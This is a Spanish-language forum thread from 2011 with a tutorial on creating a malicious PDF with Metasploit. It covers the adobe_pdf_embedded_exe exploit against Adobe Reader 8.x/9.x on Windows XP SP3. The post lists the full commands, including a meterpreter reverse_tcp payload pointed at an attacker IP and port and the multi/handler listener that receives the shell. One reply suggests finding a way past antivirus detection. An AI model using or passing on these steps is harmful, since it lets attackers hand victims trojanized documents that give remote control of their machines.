Infectar PDF [Video Tutorial]

Iniciado por Stiuvert, Agosto 24, 2011, 10:15:55 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 24, 2011, 10:15:55 AM Ultima modificación: Marzo 25, 2012, 01:40:45 PM por ANTRAX
Hola amigos aqui les dejo un vídeo donde se muestra la manipulación del Metasploit para obtener un PDF malintencionado que al abrirlo devuelve una shell que se conectar al atacante. El exploit mencionado afecta a las versiones de Adobe Reader v8.x, v9.x y a Windows XP SP3(2,1,0). Al final explico cada paso que se llevo a cabo en el vídeo:

Video Youtube:




Aquí está el comando y entre corchetes [] la explicación:

Código: php
Shell - Konsole
use exploit/windows/fileformat/adobe_pdf_embedded_exe [El exploit para ejecutar un el PAYLOAD al abrir un PDF]
set FILENAME nombre_salida.pdf [El nombre que tendrá el PDF una vez modificado por msf]
set INFILENAME /root/nombre_entrada.pdf [El nombre del PDF que será infectado]
set OUTPUTPATH /root/ [Directorio donde se guardará el PDF]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP que estará a la escucha para que se conecte el PAYLOAD]
set LPORT 4455 [Puerto a la escucha]
set id 0 [El S.O. y la versión del Adobe Reader que vulnera el exploit]
exploit

Ya le dijimos al PDF donde se conectara y en que puerto, ahora hay que poner el MSF a la escucha:

Shell - Konsole
back ["Atrás", dejamos de usar el exploit actual]
use exploit/multi/handler [El exploit para recibir a nuestro PAYLOAD]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP de nuestra máquina]
set LPORT 4455 [Puerto donde se conectarán]
set id 0 [Definimos los parametros del exploit]
exploit


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Agosto 24, 2011, 11:37:24 AM #1
buen tutorial, sin embargo el archivo infectado o troyanizado si se puede llamar asi es detectado por la mayoria de los AVs, habría que utilizar otro método para pasar esto de largo
salu2




"Mess with the best, die like the rest"
Octubre 28, 2011, 02:41:44 PM #2
Jooder !! cada me siento mas inseguro navegando..
Saludos.
#####################################################
#######                                Shama|TwoH                         #######
#####################################################
Octubre 28, 2011, 05:15:42 PM #3
Muy bueno si señor.  ;D
Abril 07, 2012, 05:38:26 PM #4
Muy Buen Aporte brother. sigue asii

Juegas con el mejor... pierde como los demas
Imprimir
Ir Arriba Páginas1
Acciones del Usuario